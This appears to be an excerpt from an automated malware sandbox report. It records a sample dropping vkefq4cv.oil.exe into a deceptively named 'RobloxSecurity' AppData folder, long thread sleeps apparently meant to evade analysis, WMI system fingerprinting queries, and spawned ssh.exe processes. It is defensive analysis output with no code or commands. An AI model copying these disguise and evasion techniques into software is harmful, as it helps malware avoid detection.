                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 1CF0AE90000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 1CF24830000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599766
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599641
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599532
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599407
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599188
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599063
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598938
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598813
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598688
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598578
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598469
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598344
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598235
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598109
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598000
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597891
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597781
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597665
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597563
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597438
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597219
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597094
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596985
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596860
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596735
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596610
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596485
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596360
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596235
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596110
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595985
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595860
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595735
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595610
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595485
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595360
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595235
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599655
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599546
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599437
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599218
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599107
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598984
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598765
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598656
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598546
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598437
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598218
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598107
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597970
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597844
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597734
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597625
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597515
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597406
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597187
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597077
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596953
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596843
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596734
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596625
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596515
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596406
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596187
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596078
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595969
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 582622
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeWindow / User API: threadDelayed 524Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6412Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2335Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow / User API: threadDelayed 3339Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow / User API: threadDelayed 6279Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow / User API: threadDelayed 6523
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow / User API: threadDelayed 2597
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe TID: 6496Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe TID: 1184Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe TID: 7352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599641s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599532s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599407s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599297s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599188s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599063s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598938s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598813s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598688s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598578s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598469s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598344s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598235s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598109s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597891s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597781s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597665s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597563s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597328s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597219s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597094s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596985s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596860s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596735s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596610s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596485s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596360s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596235s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -596110s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595985s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595735s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595610s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595485s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 4452Thread sleep count: 6523 > 30
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 4452Thread sleep count: 2597 > 30
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -22136092888451448s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599875s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599765s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599655s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599546s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599437s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599328s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599218s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -599107s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598984s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598875s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598765s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598656s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598546s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598437s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598328s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598218s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -598107s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597970s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597844s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597734s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597625s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597515s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597406s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597297s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597187s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -597077s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596953s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596843s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596734s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596625s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596515s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596406s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596297s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596187s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596078s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -595969s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -582622s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7732Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 128812Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 328804Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 491792Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeLast function: Thread delayed
                  Source: C:\Windows\System32\OpenSSH\ssh.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\OpenSSH\ssh.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597515
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597406
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597187
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597077
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596953
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596843
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596734
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596625
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596515
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596406
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596187
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596078
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595969
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 582622
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
